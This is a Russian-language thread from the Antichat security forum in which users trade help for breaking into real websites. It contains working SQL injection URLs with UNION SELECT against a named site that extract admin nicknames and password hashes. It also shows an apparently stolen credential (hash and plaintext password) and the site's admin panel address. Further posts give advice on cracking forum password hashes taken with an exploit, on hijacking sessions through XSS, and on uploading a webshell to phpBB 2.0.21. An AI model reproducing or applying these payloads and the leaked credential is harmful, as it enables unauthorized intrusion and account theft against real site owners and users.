ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо
а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет

всё работает говорят же пробелы убери )

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+f rom+foto.admin_table+where+id=1/*

digit:30bf4fb4729f382ca2010fd445f1796d:mityap123

http://www.hardvision.ru/admin/

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passw),3+fr om+foto.users+limit+0,1/*

Доброго времени суток.
У меня такая проблема на одном форуме IPB 2.1.6 с помощью эксплоита я нашел хеши, но куки требует ещё и сесион_айди, в экплоите он не может всё время говорит что-то типа зайдите попозже сейчас not exist. Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно. Если же толку нет расшифровывать то значит придется через xss пробовать чтоли? Но там с регистрацией проблемы стоит жесткий контроль на каждого регистрирующегося.

https://forum.antichat.ru/thread76958.html

sher_or_wer, сессию можно достать только когда юзер, который тебе нужен в онлайне, если не ошибаюсь. А хэши можно расшифровать на milw0rm.com и hashcracking.info. Или можешь побрутить сам с помощью PasswordsPro.

Спасибо за ответы ~!DoK_tOR!~ и n0ne

кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно

читай
_http://forum.antichat.ru/thread24488.html

прочитал и даже попробовал, 2 6 7 спосб
http://forum.antichat.ru/showpost.php?p=198446&postcount=3 результата не далт

смысл тыкать на тему, которая ниже этой? нету других способов\не знаешь так и пиши